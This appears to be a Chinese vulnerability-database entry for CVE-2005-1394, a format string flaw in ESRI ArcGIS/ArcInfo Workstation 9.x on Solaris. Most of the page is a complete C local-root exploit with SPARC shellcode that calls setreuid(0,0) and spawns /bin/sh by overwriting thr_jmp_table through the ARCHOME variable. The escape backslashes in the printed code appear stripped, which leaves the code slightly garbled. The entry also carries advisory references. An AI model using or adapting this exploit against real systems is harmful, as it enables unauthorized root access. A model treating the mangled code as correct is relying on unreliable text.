ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞
漏洞ID | 1108733 | 漏洞类型 | 格式化字符串 |
发布时间 | 2005-04-30 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-1394 |
CNNVD-ID | CNNVD-200505-877 |
漏洞平台 | Solaris | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
ESRIArcInfoWorkstation9.0的ArcGIS存在格式化字符串漏洞,本地用户可以通过在传递给(1)wservice或(2)lockmgr的ARCHOME环境变量中的格式化字符串限定符来获取权限。
|漏洞EXP
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <[email protected]>
** Exploit by John H. <[email protected]>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP "xa2x1cx40x11"
int iType;
struct
{
unsigned long retloc;
unsigned long retaddr;
char *type;
}targets[] =
{
/* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
0003a234 d thr_jmp_table
*/
{0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
{0x41424344,0x41424344,"DEBUG"},
},v;
//shellcode taken from netric
char shellcode[] =
"55"
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
// setreuid(0,0);
"x90x1dx80x16" // xor %l6, %l6, %o0
"x92x1dx80x16" // xor %l6, %l6, %o1
"x82x10x20xca" // mov 0xca, %g1
"x91xd0x20x08" // ta 8
"x90x1dx80x16" // xor %l6, %l6, %o0
"x92x1dx80x16" // xor %l6, %l6, %o1
"x82x18x40x01" // xor %g1, %g1, %g1
"x82x10x20xcb" // mov 0x2e, %g1
"x91xd0x20x08" // ta 8 [setregid(0,0)]
"x21x0bxd9x19" // sethi %hi(0x2f646400), %l0
"xa0x14x21x76" // or %l0, 0x176, %l0
"x23x0bxddx1d" // sethi %hi(0x2f747400), %l1
"xa2x14x60x79" // or %l1, 0x79, %l1
"xe0x3bxbfxf8" // std %l0, [ %sp - 0x8 ]
"x90x23xa0x08" // sub %sp, 8, %o0
"x92x1bx80x0e" // xor %sp, %sp, %o1
"x82x10x20x05" // mov 0x05, %g1
"x91xd0x20x08" // ta 8 [open("/dev/tty",RD_ONLY)]
"x90x10x20x02" // mov 0x02, %o0
"x82x10x20x29" // mov 0x29, %g1
"x91xd0x20x08" // ta 8 [dup(2)]
"x21x0bxd8x9a" // sethi %hi(0x2f626800), %l0
"xa0x14x21x6e" // or %l0, 0x16e, %l0
"x23x0bxcbxdc" // sethi %hi(0x2f2f7000), %l1
"xa2x14x63x68" // or %l1, 0x368, %l1
"xe0x3bxbfxf0" // std %l0, [ %sp - 0x10 ]
"xc0x23xbfxf8" // clr [ %sp - 0x8 ]
"x90x23xa0x10" // sub %sp, 0x10, %o0
"xc0x23xbfxec" // clr [ %sp - 0x14 ]
"xd0x23xbfxe8" // st %o0, [ %sp - 0x18 ]
"x92x23xa0x18" // sub %sp, 0x18, %o1
"x94x22x80x0a" // sub %o2, %o2, %o2
"x82x18x40x01" // xor %g1, %g1, %g1
"x82x10x20x3b" // mov 0x3b, %g1
"x91xd0x20x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
"x82x10x20x01" // mov 0x01, %g1
"x91xd0x20x08" // ta 8 [exit(?)]
"x10xbfxffxdf" // b shellcode
"x90x1dx80x16"; // or %o1, %o1, %o1
/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 24) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 0) & 0xff;
return ptr;
}
/* main */
int main(int argc, char **argv)
{
unsigned long retaddr;
unsigned long retloc;
int offset = 23;
int dump_fmt=129;
int al = 1;
int i=0;
int x=0;
int c;
unsigned long hi,lo;
static unsigned long shift0,shift1;
char buf[9000];
char *args[24];
char *env[6];
char *ptr;
char padding[64];
char padding1[64];
char buf2[9000];
if (argc < 3) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
case 'h':
usage (argv[0]);
return 0;
case 't':
iType = atoi (optarg);
break;
default:
usage (argv[0]);
return 0;
}
}
if (argc < 2) { usage(argv[0]); exit(1); }
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.n");
return 0;
}
env[0] = shellcode;
env[1] = buf2;
env[2] = NULL;
args[0] = VULPROG;
args[1] = NULL;
retloc = targets[iType].retloc;
retaddr = targets[iType].retaddr;
hi = (retaddr >> 16) & 0xffff;
lo = (retaddr >> 0) & 0xffff;
shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;
memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2));
ptr = buf;
for (i = 0; i < al; i++) {
*ptr++ = 0x41;
}
ptr = putLong (ptr, 0x41414141);
ptr = putLong (ptr, retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, retloc+2);
for (i = 0 ; i < dump_fmt; i ++) {
memcpy(ptr, "%.8x", 4);
ptr = ptr + 4;
}
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");
strcat(buf2,"ARCHOME=");
memcpy(buf2+strlen(buf2),buf,strlen(buf));
execve (args[0], args, env);
perror ("execve");
return 0;
}
int usage(char *p)
{
int i;
printf( "Arcgis local root format string exploitrn");
printf( "Usage: %s <-t target>n",p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%dt%sn", i, targets[i].type);
}
return 0;
}
// milw0rm.com [2005-04-30]
|参考资料
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
来源:SECTRACK
名称:1013852
链接:http://securitytracker.com/id?1013852
来源:SECUNIA
名称:15196
链接:http://secunia.com/advisories/15196
来源:support.esri.com
链接:http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID;=14&MetaID;=1015
来源:FULLDISC
名称:20050430DMA[2005-0425a]-‘ESRIArcGIS9.xmultiplelocalvulnerabilities
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=111489411524630&w;=2
相关推荐: Microsoft OWC Spreadsheet XMLURL Local File Existence Disclosure Vulnerability
Microsoft OWC Spreadsheet XMLURL Local File Existence Disclosure Vulnerability 漏洞ID 1102211 漏洞类型 Design Error 发布时间 2002-04-08 更新时间…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666